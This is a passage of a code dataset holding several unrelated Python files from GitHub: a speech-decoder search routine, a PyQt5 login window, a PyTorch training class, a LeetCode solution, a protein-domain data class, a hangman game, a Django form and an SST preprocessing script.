)\n decoder_out = model.decoder(decoder_input, need_pad=False)\n decoder_out = model.joiner.decoder_proj(decoder_out)\n\n sorted_ans = [h[context_size:] for h in hyps]\n ans = []\n unsorted_indices = packed_encoder_out.unsorted_indices.tolist()\n for i in range(N):\n ans.append(sorted_ans[unsorted_indices[i]])\n return ans\n\nLOG_EPS = math.log(1e-10)\n\n\nclass GreedySearchOffline:\n def __init__(self):\n pass\n\n @torch.no_grad()\n def process(\n self,\n model,\n features: List[torch.Tensor],\n ) -> List[List[int]]:\n \"\"\"\n Args:\n model:\n RNN-T model decoder model\n features:\n A list of 2-D tensors. Each entry is of shape\n (num_frames, feature_dim).\n Returns:\n Return a list-of-list containing the decoding token IDs.\n \"\"\"\n features_length = torch.tensor(\n [f.size(0) for f in features],\n dtype=torch.int64,\n )\n features = pad_sequence(\n features,\n batch_first=True,\n padding_value=LOG_EPS,\n )\n\n features = features.to(device)\n features_length = features_length.to(device)\n\n if device.type == \"cpu\":\n encoder_out, encoder_out_length = model.encoder(\n features,\n features_length,\n )\n elif device.type == \"cuda\":\n with torch.cuda.amp.autocast():\n encoder_out, encoder_out_length = model.encoder(\n features,\n features_length,\n )\n else:\n raise NotImplementedError(\"Device not supported\")\n\n hyp_tokens = greedy_search_batch(\n model=model,\n encoder_out=encoder_out,\n encoder_out_lens=encoder_out_length.cpu(),\n )\n return hyp_tokens","repo_name":"lucasjinreal/aural","sub_path":"aural/modeling/post/geedysearch.py","file_name":"geedysearch.py","file_ext":"py","file_size_in_byte":6757,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} +{"seq_id":"35973854682","text":"from PyQt5.Qt import *\nimport sys\nfrom database import user_con\nfrom MainWindow import MainWindow\nfrom userRecordDatabase import user_record_con\n\nuserCon = user_con(\"data.db\")\nuserRecordCon = user_record_con(\"userCon.db\")\n\n\n# 登录界面\nclass LoginWindow(QWidget):\n def __init__(self):\n super(LoginWindow, self).__init__()\n self.resize(300, 100)\n self.setWindowTitle(\"登录\")\n\n # 实例化标签,输入框,按钮等内容\n self.userLabel = QLabel(\"用户名:\", self)\n self.pwdLabel = QLabel(\"密码:\", self)\n self.userLine = QLineEdit(self)\n self.pwdLine = QLineEdit(self)\n self.loginButton = QPushButton(\"登录\", self)\n self.signinButton = QPushButton(\"注册\", self)\n\n # 摆放框架的实例化\n self.userAndPwdLayout = QGridLayout() # 用户名与密码区的摆放\n self.buttonLayout = QHBoxLayout() # 登录与注册按钮的摆放\n self.allLayout = QVBoxLayout() # 总体的纵向摆放\n\n self.lineedit_init()\n self.pushbutton_init()\n self.layout_init() # 登录框的摆放初始化\n self.signin_page = SigninPage() # 实例化注册页面\n\n # 登录界面用户名与输入框部分的初始化\n def lineedit_init(self):\n self.userLine.setPlaceholderText(\"请输入您的用户名\")\n self.pwdLine.setPlaceholderText(\"请输入您的密码\")\n self.pwdLine.setEchoMode(QLineEdit.Password)\n self.userLine.textChanged.connect(self.check_input_func)\n self.pwdLine.textChanged.connect(self.check_input_func)\n\n # 登录按钮的信号与槽函数的链接\n def pushbutton_init(self):\n self.loginButton.setEnabled(False)\n self.loginButton.clicked.connect(self.check_login_func)\n self.signinButton.clicked.connect(self.show_signin_page_func)\n\n # 摆放内容的填充\n def layout_init(self):\n self.userAndPwdLayout.addWidget(self.userLabel, 0, 0, 1, 1)\n self.userAndPwdLayout.addWidget(self.userLine, 0, 1, 1, 1)\n self.userAndPwdLayout.addWidget(self.pwdLabel, 1, 0, 1, 1)\n self.userAndPwdLayout.addWidget(self.pwdLine, 1, 1, 1, 1)\n self.buttonLayout.addWidget(self.loginButton)\n self.buttonLayout.addWidget(self.signinButton)\n self.allLayout.addLayout(self.userAndPwdLayout)\n self.allLayout.addLayout(self.buttonLayout)\n\n self.setLayout(self.allLayout)\n\n # 检查用户名与密码输入框是否为空,保证两者任何一个为空时登录按钮不能被点击\n def check_input_func(self):\n if self.userLine.text() and self.pwdLine.text():\n self.loginButton.setEnabled(True)\n else:\n self.loginButton.setEnabled(False)\n\n # 登录,验证用户名与密码的匹配\n def check_login_func(self):\n if userCon.login(self.userLine.text(), self.pwdLine.text()):\n QMessageBox.information(self, \"Information\", \"登陆成功!\")\n self.close()\n self.mainWindow = MainWindow(self.userLine.text())\n self.mainWindow.show()\n else:\n QMessageBox.critical(self, \"Wrong\", \"用户名或密码错误\")\n self.pwdLine.clear()\n\n # 注册界面的唤出\n def show_signin_page_func(self):\n self.signin_page.exec_()\n\n\n# 注册窗口\nclass SigninPage(QDialog):\n def __init__(self):\n super(SigninPage, self).__init__()\n self.setWindowTitle(\"注册\")\n\n self.signinUserLabel = QLabel(\"新的用户名:\", self)\n self.signinPwdLabel = QLabel(\"密码:\", self)\n self.signinPwd2Label = QLabel(\"重复密码:\", self)\n self.signinUserLine = QLineEdit(self)\n self.signinPwdLine = QLineEdit(self)\n self.signinPwd2Line = QLineEdit(self)\n self.signinButton = QPushButton(\"注册\", self)\n\n self.userHLayout = QHBoxLayout()\n self.pwdHLayout = QHBoxLayout()\n self.pwd2HLayout = QHBoxLayout()\n self.allVLayout = QVBoxLayout()\n\n self.lineedit_init()\n self.pushbutton_init()\n self.layout_init()\n\n # 注册界面用户名与输入框部分的初始化,完成与检测输入内容函数的链接\n def lineedit_init(self):\n self.signinPwdLine.setEchoMode(QLineEdit.Password)\n self.signinPwd2Line.setEchoMode(QLineEdit.Password)\n self.signinPwdLine.setPlaceholderText(\"长度不少于6位,不多于32位\")\n self.signinPwd2Line.setPlaceholderText(\"请重复输入上述密码\")\n\n self.signinUserLine.textChanged.connect(self.check_input_func)\n self.signinPwdLine.textChanged.connect(self.check_input_func)\n self.signinPwd2Line.textChanged.connect(self.check_input_func)\n\n # 注册界面注册按钮的初始化,完成与注册功能的链接\n def pushbutton_init(self):\n self.signinButton.setEnabled(False)\n self.signinButton.clicked.connect(self.signin_func)\n\n # 页面摆放内容的添加\n def layout_init(self):\n self.userHLayout.addWidget(self.signinUserLabel)\n self.userHLayout.addWidget(self.signinUserLine)\n self.pwdHLayout.addWidget(self.signinPwdLabel)\n self.pwdHLayout.addWidget(self.signinPwdLine)\n self.pwd2HLayout.addWidget(self.signinPwd2Label)\n self.pwd2HLayout.addWidget(self.signinPwd2Line)\n\n self.allVLayout.addLayout(self.userHLayout)\n self.allVLayout.addLayout(self.pwdHLayout)\n self.allVLayout.addLayout(self.pwd2HLayout)\n self.allVLayout.addWidget(self.signinButton)\n\n self.setLayout(self.allVLayout)\n\n # 检测三个输入框内是否含有内容\n def check_input_func(self):\n if (\n self.signinUserLine.text()\n and self.signinPwdLine.text()\n and self.signinPwd2Line.text()\n ):\n self.signinButton.setEnabled(True)\n else:\n self.signinButton.setEnabled(False)\n\n # 完成注册功能,检查注册时两次输入的密码是否保持一致,并启动主界面\n def signin_func(self):\n if self.signinPwdLine.text() != self.signinPwd2Line.text():\n QMessageBox.critical(self, \"错误\", \"两次输入的密码不一致!\")\n else:\n res = userCon.register(self.signinUserLine.text(), self.signinPwdLine.text())\n if res == 0:\n userRecordCon.createUserTable(self.signinUserLine.text())\n userRecordCon.createUserStar(self.signinUserLine.text())\n QMessageBox.information(self, \"提示\", \"注册成功,请重新登陆\")\n self.close()\n self.signinUserLine.clear()\n self.signinPwdLine.clear()\n self.signinPwd2Line.clear()\n elif res == 1:\n QMessageBox.critical(self, \"错误\", \"密码长度不符合要求!\")\n self.signinUserLine.clear()\n self.signinPwdLine.clear()\n self.signinPwd2Line.clear()\n else:\n QMessageBox.critical(self, \"错误\", \"用户名已存在\")\n self.signinUserLine.clear()\n self.signinPwdLine.clear()\n self.signinPwd2Line.clear()\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n loginWindow = LoginWindow()\n loginWindow.show()\n sys.exit(app.exec_())\n","repo_name":"renyufly/what_to_eat2023","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":7352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26445473781","text":"# -*- coding: utf-8 -*-\r\nimport torch\r\nfrom torch import nn\r\nfrom torch import optim\r\nfrom torch.autograd import Variable\r\nimport torchvision.models as models\r\n\r\nimport model\r\n\r\nimport time\r\nimport os\r\nimport math\r\nimport sys\r\n\r\nfrom tqdm import tqdm\r\n\r\nfrom utils import logger_setting\r\n# from model_baf_vgg19 import vgg19 as vgg19_baf\r\nfrom model_vgg import vgg19 as vgg19_baf\r\n\r\nclass GradReverse(torch.autograd.Function):\r\n @staticmethod\r\n def forward(ctx, x):\r\n return x.view_as(x)\r\n\r\n @staticmethod\r\n def backward(ctx, grad_output):\r\n return grad_output.neg() * 0.1\r\n\r\ndef grad_reverse(x):\r\n return GradReverse.apply(x)\r\n\r\nclass AdaptiveConcatPool2d(torch.nn.Module):\r\n \"Layer that concats `AdaptiveAvgPool2d` and `AdaptiveMaxPool2d`.\"\r\n def __init__(self, sz=None):\r\n \"Output will be 2*sz or 2 if sz is None\"\r\n super(AdaptiveConcatPool2d, self).__init__()\r\n self.output_size = sz or 1\r\n self.ap = torch.nn.AdaptiveAvgPool2d(self.output_size)\r\n self.mp = torch.nn.AdaptiveMaxPool2d(self.output_size)\r\n\r\n def forward(self, x): return torch.cat([self.mp(x), self.ap(x)], 1)\r\n\r\nclass FinetuneModel():\r\n def __init__(self) -> None:\r\n self.bn_types = (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d)\r\n \r\n def freeze_all(self, model_params):\r\n for param in model_params:\r\n param.requires_grad = False\r\n\r\n def create_head(self, nf, nc, bn_final=False, single_head=False):\r\n \"Model head that takes in 'nf' features and outputs 'nc' classes\"\r\n pool = AdaptiveConcatPool2d()\r\n layers = [pool, torch.nn.Flatten()]\r\n if single_head:\r\n layers += self.head_blocks(nf, 0.5, nc)\r\n else:\r\n layers += self.head_blocks(nf, 0.25, 512, torch.nn.ReLU(inplace=True))\r\n layers += self.head_blocks(512, 0.5, nc)\r\n \r\n if bn_final:\r\n layers.append(nn.BatchNorm1d(nc, momentum=0.01))\r\n \r\n return nn.Sequential(*layers)\r\n\r\n def head_blocks(self, in_dim, p, out_dim, activation=None):\r\n \"Basic Linear block\"\r\n layers = [\r\n nn.BatchNorm1d(in_dim),\r\n nn.Dropout(p),\r\n nn.Linear(in_dim, out_dim)\r\n ]\r\n \r\n if activation is not None:\r\n layers.append(activation)\r\n \r\n return layers \r\n\r\n def requires_grad(self, layer):\r\n \"Determines whether 'layer' requires gradients\"\r\n ps = list(layer.parameters())\r\n if not ps: return None\r\n return ps[0].requires_grad\r\n\r\n def cnn_model(self, model, nc, hidden, single_head=False, bn_final=False, init=torch.nn.init.kaiming_normal_):\r\n \"Creates a model using a pretrained 'model' and appends a new head to it with 'nc' outputs\"\r\n \r\n # remove dense and freeze everything\r\n if single_head:\r\n body = nn.Sequential(*list(model.children())[:-1])\r\n else:\r\n body = nn.Sequential(*list(model.children())[:-2])\r\n head = self.create_head(hidden, nc, bn_final, single_head)\r\n \r\n model = torch.nn.Sequential(body, head)\r\n \r\n # freeze the resnet34 base of the model\r\n self.freeze_all(model[0].parameters())\r\n \r\n # initialize the weights of the head\r\n for child in model[1].children():\r\n if isinstance(child, torch.nn.Module) and (not isinstance(child, self.bn_types)) and self.requires_grad(child): \r\n init(child.weight)\r\n \r\n return model \r\n\r\n\r\n\r\nclass Trainer(object):\r\n def __init__(self, option, steps_per_epoch):\r\n self.option = option\r\n\r\n self._build_model()\r\n self._set_optimizer(steps_per_epoch)\r\n self.logger = logger_setting(option.exp_name, option.save_dir, option.debug)\r\n\r\n def _build_model(self):\r\n if self.option.model == 'cnn':\r\n self.net = model.convnet(num_classes=self.option.n_class)\r\n elif self.option.model == 'resnet18':\r\n if self.option.use_pretrain:\r\n resnet = models.resnet18(pretrained = True)\r\n resnet.eval()\r\n ft = FinetuneModel()\r\n self.net = ft.cnn_model(resnet, self.option.n_class, 1024, bn_final=True)\r\n else:\r\n self.net = models.resnet18(pretrained = False, num_classes=self.option.n_class)\r\n # self.net = models.resnet18(pretrained = True)\r\n # self.net.fc = nn.Linear(512, self.option.n_class)\r\n \r\n elif self.option.model == 'resnet101':\r\n self.net = models.resnet101(pretrained = False, num_classes=self.option.n_class)\r\n\r\n\r\n elif self.option.model == 'vgg19':\r\n if self.option.use_pretrain:\r\n vgg19 = models.vgg19(pretrained = True)\r\n vgg19.eval()\r\n ft = FinetuneModel()\r\n self.net = ft.cnn_model(vgg19, self.option.n_class, 1024, bn_final=True)\r\n else:\r\n self.net = models.vgg19(pretrained = False, num_classes=self.option.n_class)\r\n \r\n elif self.option.model == 'mobilenet':\r\n if self.option.use_pretrain:\r\n mobilenet = models.mobilenet_v2(pretrained = True)\r\n mobilenet.eval()\r\n ft = FinetuneModel()\r\n self.net = ft.cnn_model(mobilenet, self.option.n_class, 2560, bn_final=True, single_head=True)\r\n else:\r\n self.net = models.vgg19(pretrained = False, num_classes=self.option.n_class)\r\n\r\n elif self.option.model == 'googlenet':\r\n if self.option.use_pretrain:\r\n googlenet = models.googlenet(pretrained = True)\r\n googlenet.eval()\r\n ft = FinetuneModel()\r\n self.net = ft.cnn_model(googlenet, self.option.n_class, 2048, bn_final=True)\r\n else:\r\n self.net = models.googlenet(pretrained = False, num_classes=self.option.n_class)\r\n\r\n elif self.option.model == 'alexnet':\r\n if self.option.use_pretrain:\r\n alexnet = models.alexnet(pretrained = True)\r\n alexnet.eval()\r\n ft = FinetuneModel()\r\n self.net = ft.cnn_model(alexnet, self.option.n_class, 512, bn_final=True)\r\n else:\r\n self.net = models.alexnet(pretrained = False, num_classes=self.option.n_class)\r\n \r\n elif self.option.model == 'vgg19_baf':\r\n from model_baf_vgg19 import vgg19 as vgg19_baf\r\n\r\n if self.option.use_pretrain:\r\n vgg19_baf = vgg19_baf(pretrained = True)\r\n vgg19_baf.eval()\r\n ft = FinetuneModel()\r\n self.net = ft.cnn_model(vgg19_baf, self.option.n_class, 512, bn_final=True)\r\n else:\r\n self.net = vgg19_baf(pretrained = False, num_classes=self.option.n_class)\r\n\r\n self.loss = nn.CrossEntropyLoss(ignore_index=255)\r\n\r\n if self.option.cuda:\r\n self.net.cuda()\r\n self.loss.cuda()\r\n\r\n\r\n def _set_optimizer(self, steps):\r\n # self.optim = optim.SGD(filter(lambda p: p.requires_grad, self.net.parameters()), lr=self.option.lr, momentum=self.option.momentum, weight_decay=self.option.weight_decay)\r\n # self.optim = optim.Adam(filter(lambda p: p.requires_grad, self.net.parameters()), lr=self.option.lr, weight_decay=self.option.weight_decay)\r\n \r\n self.optim = optim.Adam(self.net.parameters(), lr=self.option.lr, weight_decay=self.option.weight_decay)\r\n lr_lambda = lambda step: self.option.lr_decay_rate ** (step // self.option.lr_decay_period)\r\n self.scheduler = optim.lr_scheduler.LambdaLR(self.optim, lr_lambda=lr_lambda, last_epoch=-1)\r\n \r\n # self.optim = optim.Adam(self.net.parameters(), lr=1e-7, weight_decay=1e-5)\r\n # self.scheduler = torch.optim.lr_scheduler.OneCycleLR(self.optim, max_lr=5e-2, pct_start=0.3, steps_per_epoch=steps, epochs=self.option.max_step)\r\n \r\n if self.option.use_pretrain:\r\n self.optim = optim.Adam(self.net.parameters(), lr=1e-7, weight_decay=1e-5)\r\n self.scheduler = torch.optim.lr_scheduler.OneCycleLR(self.optim, max_lr=5e-2, pct_start=0.3, steps_per_epoch=steps, epochs=self.option.max_step)\r\n\r\n\r\n @staticmethod\r\n def _weights_init_xavier(m):\r\n classname = m.__class__.__name__\r\n if classname == 'BasicConv2d' or classname == 'ConvBNReLU':\r\n pass\r\n elif classname.find('Conv') != -1:\r\n nn.init.xavier_normal_(m.weight.data, gain=1.0)\r\n elif classname.find('Linear') != -1:\r\n nn.init.xavier_normal_(m.weight.data, gain=1.0) \r\n\r\n def _initialization(self):\r\n self.net.apply(self._weights_init_xavier)\r\n\r\n if self.option.is_train and self.option.use_pretrain:\r\n if self.option.checkpoint is not None:\r\n self._load_model()\r\n else:\r\n print(\"no prtrained model\")\r\n\r\n\r\n def _mode_setting(self, is_train=True):\r\n if is_train:\r\n self.net.train()\r\n else:\r\n self.net.eval()\r\n\r\n\r\n def _train_step(self, data_loader, step):\r\n loss_sum = 0.\r\n total_num_correct = 0.\r\n total_num_test = 0.\r\n for i, (images,labels) in enumerate(tqdm(data_loader)):\r\n images = self._get_variable(images)\r\n labels = self._get_variable(labels)\r\n pred_label = self.net(images)\r\n\r\n total_num_correct += self._num_correct(pred_label,labels,topk=1).data\r\n batch_size = images.shape[0]\r\n total_num_test += batch_size\r\n\r\n loss = self.loss(pred_label, torch.squeeze(labels))\r\n loss_sum += loss\r\n loss.backward()\r\n self.optim.step()\r\n avg_acc = total_num_correct/total_num_test\r\n msg = f\"[TRAIN] LOSS {loss_sum/len(data_loader)}, ACCURACY : {avg_acc}\"\r\n\r\n self.logger.info(msg)\r\n\r\n\r\n def _validate(self, data_loader, step=0):\r\n self._mode_setting(is_train=False)\r\n\r\n if not self.option.is_train:\r\n print('not in training process')\r\n self._initialization()\r\n if self.option.checkpoint is not None:\r\n self._load_model()\r\n else:\r\n print(\"No trained model\")\r\n sys.exit()\r\n num_test = 10000\r\n\r\n total_num_correct = 0.\r\n total_num_test = 0.\r\n total_loss = 0.\r\n with torch.no_grad():\r\n for i, (images,labels) in enumerate(tqdm(data_loader)):\r\n \r\n images = self._get_variable(images)\r\n labels = self._get_variable(labels)\r\n\r\n # self.optim.zero_grad()\r\n pred_label = self.net(images)\r\n\r\n loss = self.loss(pred_label, torch.squeeze(labels))\r\n \r\n batch_size = images.shape[0]\r\n total_num_correct += self._num_correct(pred_label,labels,topk=1).data\r\n total_loss += loss.data*batch_size\r\n total_num_test += batch_size\r\n \r\n avg_loss = total_loss/total_num_test\r\n avg_acc = total_num_correct/total_num_test\r\n msg = f\"[EVALUATION] step {step}, LOSS {avg_loss}, ACCURACY : {avg_acc}\"\r\n self.logger.info(msg)\r\n\r\n\r\n def _num_correct(self,outputs,labels,topk=1):\r\n _, preds = outputs.topk(k=topk, dim=1)\r\n preds = preds.t()\r\n correct = preds.eq(labels.view(1, -1).expand_as(preds))\r\n correct = correct.view(-1).sum()\r\n return correct\r\n\r\n\r\n def _accuracy(self, outputs, labels):\r\n batch_size = labels.size(0)\r\n _, preds = outputs.topk(k=1, dim=1)\r\n preds = preds.t()\r\n correct = preds.eq(labels.view(1, -1).expand_as(preds))\r\n correct = correct.view(-1).float().sum(0, keepdim=True)\r\n accuracy = correct.mul_(100.0 / batch_size)\r\n return accuracy\r\n\r\n\r\n def _save_model(self, step):\r\n torch.save({\r\n 'step': step,\r\n 'optim_state_dict': self.optim.state_dict(),\r\n 'net_state_dict': self.net.state_dict()\r\n }, os.path.join(self.option.save_dir,self.option.exp_name, f'checkpoint_step_{step}.pth'))\r\n print('checkpoint saved. step : %d'%step)\r\n\r\n\r\n def _load_model(self):\r\n ckpt = torch.load(self.option.checkpoint)\r\n self.net.load_state_dict(ckpt['net_state_dict'])\r\n self.optim.load_state_dict(ckpt['optim_state_dict'])\r\n\r\n\r\n def train(self, train_loader, val_loader=None):\r\n if not self.option.use_pretrain:\r\n self._initialization()\r\n if self.option.checkpoint is not None:\r\n self._load_model()\r\n\r\n start_epoch = 0\r\n for step in range(start_epoch, self.option.max_step):\r\n self._mode_setting(is_train=True)\r\n\r\n if self.option.train_baseline:\r\n self._train_step_baseline(train_loader, step)\r\n else:\r\n self._train_step(train_loader,step)\r\n self.scheduler.step()\r\n\r\n if step == 1 or step % self.option.save_step == 0 or step == (self.option.max_step-1):\r\n if val_loader is not None:\r\n self._validate(val_loader, step)\r\n self._save_model(step)\r\n\r\n\r\n def _get_variable(self, inputs):\r\n if self.option.cuda:\r\n return Variable(inputs.cuda())\r\n return Variable(inputs)\r\n\r\nif __name__ == '__main__': main()\r\n","repo_name":"dkdkkim/biases-are-features","sub_path":"DK/trainer_dk.py","file_name":"trainer_dk.py","file_ext":"py","file_size_in_byte":13580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"10738523526","text":"# @before-stub-for-debug-begin\nfrom python3problem1 import *\nfrom typing import *\n# @before-stub-for-debug-end\n\n#\n# @lc app=leetcode.cn id=1 lang=python3\n#\n# [1] 两数之和\n#\n\n# @lc code=start\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n\n Hashable = dict()\n for id, num in enumerate(nums):\n res = target - num\n if res in Hashable:\n return [Hashable[res], id]\n else:\n Hashable[num] = id\n return []\n\n# @lc code=end\n\n","repo_name":"MaxZN/Leetcode","sub_path":"1.两数之和.py","file_name":"1.两数之和.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3531268397","text":"\"\"\"\nclass that represents FunFam entries\n\"\"\"\n\n\nclass FunFamEntry(object):\n\n def __init__(self, id, funfam, superfamily, start, end, uniprot_ids, ec_ids, sequence, sequence_aligned_by_funfam):\n self.id = id\n self.funfam = funfam\n self.superfamily = superfamily\n self.start = start\n self.end = end\n self.uniprot_ids = uniprot_ids\n self.ec_ids = ec_ids\n self.sequence = sequence\n self.aligned_sequence_funfam = sequence_aligned_by_funfam\n self.sites = []\n\n def __str__(self):\n return (self.id + \";\\t\" + str(self.uniprot_ids) + \";\\t\" + str(\n self.ec_ids) + \";\\t\" + self.funfam + \";\\t\" + self.superfamily + \";\\t\" + str(self.start) + \";\\t\" + str(\n self.end) + \";\\n\" + str(self.aligned_sequence_funfam) + \";\\n\" + str(self.sites) + \";\\n\" + str(\n self.mapped_sites_funfam))\n\n def __eq__(self, other):\n \"\"\"\n checks if two funfam_entry objects represent the same domain sequence\n :param other: funfam_entry\n :return: boolean\n \"\"\"\n return self.superfamily == other.superfamily and self.funfam == other.funfam and self.id == other.id\n\n def __hash__(self):\n return hash((self.id, self.superfamily, self.funfam, self.start, self.end))\n\n def add_binding_sites(self, uniprot_binding_site_mapping):\n for uniprot_id in self.uniprot_ids:\n self.sites.append(uniprot_binding_site_mapping.get(uniprot_id))\n\n def process_sites(self):\n i = 0\n index = -1\n relevant_sites = None\n for binding_sites in self.sites:\n index += 1\n if binding_sites is None:\n continue\n if not binding_sites:\n continue\n i += 1\n relevant_sites = binding_sites\n\n if i > 1:\n print(\"ambiguity processing sites:\", self.id, self.funfam, self.superfamily)\n # print(self.sites)\n # raise ValueError(\"multiple binding site annotations for entry\")\n return (False)\n if relevant_sites is None:\n self.sites = None\n else:\n self.sites = [site for site in relevant_sites if (site >= self.start and site <= self.end)]\n self.binding_site_id = self.uniprot_ids[index]\n\n return (True)\n\n def write_info(self, group):\n print(self.id, self.funfam, self.superfamily, self.start, self.end, self.binding_site_id)\n print(\"uniprot ids:\", self.uniprot_ids)\n print(\"binding sites\", self.sites)\n if group == \"ec\":\n print(\"mapped sites ec:\", self.mapped_sites_ec)\n elif group == \"funfam\":\n print(\"mapped sites funfam:\", self.mapped_sites_funfam)\n print(\"ec numbers:\", self.ec_ids)\n\n def map_binding_sites(self, group):\n '''maps binding sites from the sequence to the ec alignment level'''\n if group == \"funfam\":# or group in ['funfam-on-ec-subset', 'funfam-on-pfam-subset', 'funfam-on-prosite-subset', 'pfam-on-subset']:\n sequence = self.aligned_sequence_funfam\n elif group == \"ec\":\n sequence = self.aligned_sequence_ec\n elif group == \"pfam\":\n sequence = self.aligned_sequence_pfam\n elif group == \"prosite\":\n sequence = self.aligned_sequence_prosite\n else:\n raise ValueError(\"group has to be funfam or ec\")\n\n out = []\n for bs in self.sites:\n gaps = 0\n counter = self.start - 1\n for aa in sequence:\n if aa == '-':\n gaps = gaps + 1\n else:\n counter = counter + 1\n if counter == bs:\n break\n out.append(bs + gaps - self.start + 1)\n\n if group == \"funfam\":# or group in ['funfam-on-ec-subset', 'funfam-on-pfam-subset', 'funfam-on-prosite-subset']:\n self.mapped_sites_funfam = out\n elif group == \"ec\":\n self.mapped_sites_ec = out\n elif group == \"pfam\":\n self.mapped_sites_pfam = out\n elif group == \"prosite\":\n self.mapped_sites_prosite = out\n","repo_name":"Rostlab/FunFamsConsensus","sub_path":"code_similarity/funfam_entry.py","file_name":"funfam_entry.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36403829490","text":"import random\n\nword_list = [\"python\", \"asmr\", \"computer\", \"programming\", \"coding\", \"tutorial\"]\n\n\ndef selected_word():\n word = random.choice(word_list)\n return word.upper()\n\ndef play(word):\n # Create a list of underscores to represent the unknown letters of the word\n word_completion = \"_\" * len(word)\n guessed = False\n guessed_letters = []\n guessed_words = []\n tries = 6\n\n print(\"Let's play Hangman!\")\n print(display_hangman(tries))\n print(word_completion+\"\\n\")\n\n while not guessed and tries > 0:\n guess = input(\"Please guess a letter or word: \").upper()\n if len(guess) == 1 and guess.isalpha():\n # If user guesses a letter\n if guess in guessed_letters:\n print(\"You already guessed the letter\", guess)\n elif guess not in word:\n print(guess, \"is not in the word.\")\n tries -= 1\n guessed_letters.append(guess)\n else: \n print(\"Good job!\", guess, \"is in the word\")\n guessed_letters.append(guess)\n # Add guess to word_completion instead of _\n word_as_list = list(word_completion)\n indices = [i for i, letter in enumerate(word) if letter == guess]\n for index in indices:\n word_as_list[index] = guess\n word_completion = \"\".join(word_as_list)\n if \"_\" not in word_completion:\n guessed = True\n elif len(guess) == len(word) and guess.isalpha():\n # If user guesses a word\n if guess in guessed_words:\n print(\"You already guessed this word\")\n elif guess != word:\n print(guess, \"is not the word.\")\n tries -= 1\n guessed_words.append(guess)\n else:\n guessed = True\n word_completion = word\n else:\n print(\"Not a valid guess.\")\n print(display_hangman(tries))\n print(word_completion, \"\\n\")\n\n if guessed: \n print(\"Congratulations, you guessed the word!\")\n else:\n print(\"Sorry, you ran out of tries. The word was\", word, \".\")\n \n\ndef display_hangman(tries):\n stages = [\n \"\"\"\n --------\n | |\n | O\n | \\\\|/\n | |\n | / \\\\\n -\n \"\"\",\n \"\"\"\n --------\n | |\n | O\n | \\\\|/\n | |\n | / \n -\n \"\"\",\n \"\"\"\n --------\n | |\n | O\n | \\\\|/\n | |\n | \n -\n \"\"\",\n \"\"\"\n --------\n | |\n | O\n | \\\\|\n | |\n | \n -\n \"\"\",\n \"\"\"\n --------\n | |\n | O\n | |\n | |\n | \n -\n \"\"\",\n \"\"\"\n --------\n | |\n | O\n | \n | \n | \n -\n \"\"\",\n \"\"\"\n --------\n | |\n | \n | \n | \n | \n -\n \"\"\",\n\n ]\n return stages[tries]\n\n\nword = selected_word()\nplay(word)\n","repo_name":"ANPetru/HangmainInPython","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33689369491","text":"from django import forms\n\nfrom apps.participant.models import Participant\n\n\nclass ParticipateForm(forms.ModelForm):\n\n class Meta:\n model = Participant\n fields = (\n 'is_first_time',\n 'category_id',\n 'organization_type',\n 'organization_location',\n 'organization_name',\n 'organization_number_of_employees',\n 'contact_person_name',\n 'contact_person_number',\n 'contact_person_email',\n 'secondary_contact_person_name',\n 'secondary_contact_person_number',\n 'secondary_contact_person_email',\n 'membership_certificate',\n 'trade_license'\n )\n","repo_name":"Shahkhan-web/django_shjseen","sub_path":"apps/website/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27566469411","text":"from os.path import join as pjoin\nfrom src.utils.file import save_file\n\nclass SSTPreprocess():\n def __init__(self, data_dir, label_class):\n self.label_class = label_class\n self.data_dir = data_dir\n self.trees, self.dictionary, self.sentiment_labels, self.dataset_split = self.load_sst_data(data_dir)\n self.samples = self.generate_samples()\n self.save_preprocess_file()\n\n # internal use\n def load_sst_data(self, data_dir):\n # dictionary\n dictionary = {}\n with open(pjoin(data_dir, 'dictionary.txt'), encoding='utf-8') as file:\n for line in file:\n line = line.strip().split('|')\n assert len(line) == 2\n dictionary[line[0]] = int(line[1])\n\n # sentiment_labels\n sentiment_labels = {}\n with open(pjoin(data_dir, 'sentiment_labels.txt'), encoding='utf-8') as file:\n file.readline() # for table head\n for line in file:\n line = line.strip().split('|')\n sent_float_value = float(line[1])\n\n sentiment_labels[int(line[0])] = sent_float_value\n\n # STree.txt and SOStr.txt\n trees = []\n with open(pjoin(data_dir, 'STree.txt'), encoding='utf-8') as file_STree, \\\n open(pjoin(data_dir, 'SOStr.txt'), encoding='utf-8') as file_SOStr:\n for STree, SOStr in zip(file_STree, file_SOStr):\n sent_tree = []\n STree = list(map(int, STree.strip().split('|')))\n SOStr = SOStr.strip().split('|')\n\n for idx_t, parent_idx in enumerate(STree):\n try:\n token = SOStr[idx_t]\n is_leaf = True\n leaf_node_index_seq = [idx_t+1]\n except IndexError:\n token = ''\n is_leaf = False\n leaf_node_index_seq = []\n\n new_node = {'node_index': idx_t+1, 'parent_index': parent_idx,\n 'token': token, 'is_leaf': is_leaf,\n 'leaf_node_index_seq': leaf_node_index_seq, }\n sent_tree.append(new_node)\n\n # update leaf_node_index_seq\n idx_to_node_dict = dict((tree_node['node_index'], tree_node)\n for tree_node in sent_tree)\n for tree_node in sent_tree:\n if not tree_node['is_leaf']: break\n pre_node = tree_node\n while pre_node['parent_index'] > 0:\n cur_node = idx_to_node_dict[pre_node['parent_index']]\n cur_node['leaf_node_index_seq'] += pre_node['leaf_node_index_seq']\n cur_node['leaf_node_index_seq'] = list(\n sorted(list(set(cur_node['leaf_node_index_seq']))))\n 